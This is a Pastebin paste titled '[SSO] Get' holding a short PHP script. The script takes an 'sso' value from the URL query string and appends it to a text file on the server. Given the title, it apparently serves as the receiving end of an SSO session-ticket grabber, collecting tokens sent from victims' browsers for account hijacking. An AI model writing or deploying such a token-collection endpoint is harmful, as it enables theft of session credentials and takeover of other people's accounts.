Advertisement
Fabriciool

[SSO] Get

Oct 1st, 2013
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $sso = $_GET['sso'];
  3. $handle = fopen("sso.txt", "a");
  4. $asd = "SSO : $sso";
  5. fwrite($handle, $asd);
  6. fclose($handle);
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement